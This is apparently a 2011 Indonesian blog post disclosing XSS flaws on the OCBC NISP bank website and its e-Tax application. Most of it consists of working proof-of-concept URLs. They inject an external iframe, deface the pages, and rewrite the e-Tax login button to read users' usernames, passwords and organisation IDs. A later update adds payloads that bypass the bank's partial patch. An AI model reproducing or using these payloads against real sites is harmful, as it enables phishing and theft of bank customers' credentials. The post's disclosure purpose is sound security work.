Two Critical XSS Vulnerability on OCBC NISP Bank Website


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Thursday, September 22nd, 2011
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


Tidak bisa dipungkiri lagi dan telah berulang kali terbukti bahwa Website Bank yang memiliki celah XSS sangat rawan untuk menjadi target penipuan. Senin pagi kemarin saya mendapati 2 celah XSS pada portal Bank OCBC NISP, yaitu pada website utama dan pada aplikasi e-Tax OCBC NISP.

XSS Pada OCBCNISP-DOT-COM

POC:

Search Engine:

http://www.ocbcnisp.com/?opt=search&search=%22%3E%3C/head%3E%3Cbody%3E%3Ccenter%3E%3Ca%20href=%22http://www.spyrozone.net/%22%3E%3Cimg%20border=%220%22%20src=%22http://www.spyrozone.net/playground/xssedbyspyrozone.net.png%22%3E%3C/a%3E%3Cbr%3E%3Ciframe%20width=800%20height=600%20src=http://www.spyrozone.net%3E%3C/iframe%3E%3C/center%3E%3C/body%3E%3Cnoscript%3E&x=0&y=0&lang=1

Pencarian ATM:

http://www.ocbcnisp.com/?opt=atm&cty=%22%3E%3C/head%3E%3Cbody%3E%3Ccenter%3E%3Ca%20href=%22http://www.spyrozone.net/%22%3E%3Cimg%20border=%220%22%20src=%22http://www.spyrozone.net/playground/xssedbyspyrozone.net.png%22%3E%3C/a%3E%3Cbr%3E%3Ciframe%20width=800%20height=600%20src=http://www.spyrozone.net%3E%3C/iframe%3E%3C/center%3E%3C/body%3E%3Cnoscript%3E&lang=2

Hasil:

{image: Bank OCBC NISP Website Vulnerable to XSS}

Bank OCBC NISP Website Vulnerable to XSS

XSS Pada Aplikasi e-Tax

POC:

http://etax.ocbcnisp.com/module.asp?module=1&error=%3C/div%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%20height=%2269%22%20colspan=%222%22%3E%3Cdiv%20align=%22center%22%3E%3Cinput%20name=%22Login%22%20type=%22button%22%20%20value=%22Login%22%20onClick=%22alert%28%27Info%20dari%20form%20Login%5Cn--------------------------------------------%5CnUsername:%20%27%2Bdocument.getElementsByName%28%27UserID%27%29[0].value%2B%27%5CnPassword:%20%27%2Bdocument.getElementsByName%28%27Password%27%29[0].value%2B%27%5CnOrganisation%20ID:%20%27%2Bdocument.getElementsByName%28%27orid%27%29[0].value%2B%27%5Cn%5CnInfo%20diatas%20telah%20terkirim%20ke%20server%20WWW.SPYROZONE.NET%27%29;%22%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/form%3E%3C/div%3E%3Cnoscript%3E

Hasil:

Isikan username, password & ID organisani, kemudian klik tombol [Login].

{image: Celah XSS Pada Aplikasi e-Tax OCBC NISP}

Celah XSS Pada Aplikasi e-tax OCBC NISP

Melalui XSS, saya mengganti tombol submit form menjadi tombol yang akan mengambil data pada form, lalu menampilkannya di layar.

{image: Data korban dikirim ke server lain}

Data korban dikirim ke server lain

Phisher bisa mengganti fungsi saya menjadi fungsi untuk mengirimkan data-data tersebut ke servernya untuk menampung username dan password korban.

UPDATE – 28 September 2011

Admin telah melakukan patch dengan mendeteksi adanya string “http://” pada parameter yang dilempar melalui URL. Namun, Attacker tetap bisa menampilkan informasi palsu pada kedua halaman diatas.

POC:

http://www.ocbcnisp.com/?opt=search&search=%22%3E%3CH1%3EXSSED%20by%20SPYRO%20KiD%3Cbr%3EWWW.SPYROZONE.NET%3C/H1%3E%3Cnoscript%3E&x=0&y=0&lang=1

Hasil:

{image: ocbcnisp.com Xssed by SPYRO KiD}

ocbcnisp.com Xssed by SPYRO KiD

POC:

http://etax.ocbcnisp.com/module.asp?module=1&error=%3CH1%3EXSSED%20by%20SPYRO%20KiD%3Cbr%3EWWW.SPYROZONE.NET%3C/H1%3E%3Cnoscript%3E

Hasil:

{image: e-tax OCBC NISP Xssed by SPYRO KiD}

e-tax OCBC NISP Xssed by SPYRO KiD

Penutup

Sekian, semoga bermanfaat ;)


//E.O.F